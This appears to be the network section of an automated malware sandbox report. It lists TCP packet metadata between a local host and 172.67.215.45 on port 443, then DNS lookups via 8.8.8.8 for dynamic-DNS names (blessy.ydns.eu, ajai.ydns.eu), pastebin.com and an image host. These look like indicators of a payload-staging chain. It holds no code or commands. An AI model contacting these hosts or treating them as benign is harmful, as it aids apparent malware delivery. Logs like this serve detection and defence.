Apr 24, 2024 07:32:48.505603075 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.506711960 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.506745100 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.506767988 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.506776094 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.506789923 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.508301973 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.508337021 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.508359909 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.508368969 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.508390903 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.509779930 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.509813070 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.509829998 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.509836912 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.509866953 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.511454105 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.511492968 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.511508942 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.511517048 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.511544943 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.513212919 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.513242960 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.513268948 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.513278008 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.513292074 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.514363050 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.514398098 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.514420986 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.514430046 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.514452934 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.514472961 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.516204119 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.516239882 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.516266108 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.516279936 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.516294956 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.516295910 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.516295910 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.516309977 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.516340971 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.517285109 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.517318010 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.517349958 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.517359018 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.517374039 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.518531084 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.518568039 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.518627882 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.540994883 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541026115 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541098118 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541161060 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541213036 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541223049 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541259050 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541265965 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541294098 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541299105 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541328907 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541362047 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541393995 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541405916 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541428089 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541476965 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541508913 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541527033 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.541534901 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.541554928 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.542920113 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.542969942 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.542974949 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.542987108 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.543021917 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.544413090 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.544444084 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.544466019 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.544472933 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.544486046 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.546092033 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.546138048 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.550024033 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.550031900 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.550257921 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.550417900 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.550451994 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.550472975 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.550479889 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.550492048 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.551481009 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.551517010 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.551542044 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.551551104 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.551569939 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.552721977 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.552752972 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.552777052 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.552786112 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.552799940 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.554023027 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.554056883 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.554074049 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.554081917 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.554097891 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.554105997 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.555056095 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.555088997 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.555104017 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.555113077 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.555130005 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.556273937 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.556313992 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.556324959 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.556334019 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.556360006 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.556998014 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.557027102 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.557040930 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.557049990 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.557076931 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.558423042 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.558456898 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.558469057 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.558478117 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.558499098 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.559273005 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.559303045 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.559322119 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.559330940 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.559349060 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.560772896 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.560806990 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.560837984 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.560846090 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.560861111 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.561886072 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.561916113 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.561939955 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.561947107 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.561961889 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.562860966 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.562895060 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.562905073 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.562912941 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.562938929 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.563579082 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.563607931 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.563623905 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.563631058 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.563652039 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.564970970 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.565006018 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.565017939 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.565025091 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.565052986 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.565723896 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.565752029 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.565771103 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.565778017 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.565792084 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.565800905 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.566663027 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.566699028 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.566710949 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.566719055 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.566746950 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.567687035 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.567715883 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.567742109 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.567750931 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.567764997 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.568689108 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.568727016 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.568743944 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.568753004 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.568773031 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.569703102 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.569746971 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.569761038 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.569767952 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.569792986 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.570640087 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.570672989 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.570686102 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.570693016 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.570718050 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.571346045 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.571373940 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.571393967 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.571400881 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.571414948 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.572571993 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.572609901 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.572618008 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.572626114 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.572657108 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.573761940 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.573798895 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.573811054 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.573817968 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.573843956 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.574908018 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.574939013 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.574953079 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.574960947 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.574986935 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.575720072 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.575750113 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.575766087 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.575773954 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.575787067 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.575797081 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.576811075 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.576857090 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.576874971 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.576881886 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.576896906 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.576909065 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.577553034 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.577583075 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.577604055 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.577611923 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.577624083 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.578794003 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.578829050 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.578849077 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.578857899 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.578871012 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.579977989 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.580008030 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.580025911 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.580034018 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.580046892 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.580059052 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.580929041 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.580962896 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.580975056 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.580982924 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.581007957 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.581975937 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.582005978 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.582024097 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.582031012 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.582042933 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.582056999 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.583113909 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.583147049 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.583159924 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.583168030 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.583190918 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.583949089 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.583981991 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.584003925 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.584013939 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.584029913 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.585078001 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.585129023 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.585129976 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.585144043 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.585177898 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.586285114 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.586317062 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.586334944 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.586340904 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.586357117 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.586384058 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.587183952 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.587224007 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.587239981 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.587246895 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.587263107 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.587272882 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.588356018 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.588409901 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.588419914 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.588457108 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696486950 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696515083 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.696578979 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.696605921 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.696696043 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696708918 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696713924 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.696760893 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696768999 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.696801901 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696811914 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.696821928 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.696836948 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696836948 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696846962 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.696867943 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696894884 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.696926117 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.701663971 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.701786041 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.705962896 CEST	49166	443	192.168.2.22	172.67.215.45

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 07:32:36.881078005 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:37.205791950 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:39.379667997 CEST	52917	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:39.551584005 CEST	53	52917	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:39.555078983 CEST	52917	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:39.729039907 CEST	53	52917	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:39.731262922 CEST	52917	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:39.901781082 CEST	53	52917	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:43.895076036 CEST	62751	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:44.069077969 CEST	53	62751	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:54.067840099 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:54.392231941 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:54.393527985 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:54.564074993 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:54.622144938 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:54.792591095 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:54.926876068 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:55.409745932 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 24, 2024 07:32:55.410087109 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 24, 2024 07:32:55.581137896 CEST	53	57893	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 07:32:36.881078005 CEST	192.168.2.22	8.8.8.8	0xaebf	Standard query (0)	blessy.ydns.eu	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.379667997 CEST	192.168.2.22	8.8.8.8	0x9671	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.555078983 CEST	192.168.2.22	8.8.8.8	0x9671	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.731262922 CEST	192.168.2.22	8.8.8.8	0x9671	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:43.895076036 CEST	192.168.2.22	8.8.8.8	0x205f	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:54.067840099 CEST	192.168.2.22	8.8.8.8	0x2d73	Standard query (0)	ajai.ydns.eu	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:54.393527985 CEST	192.168.2.22	8.8.8.8	0x2d73	Standard query (0)	ajai.ydns.eu	A (IP address)	IN (0x0001)	false
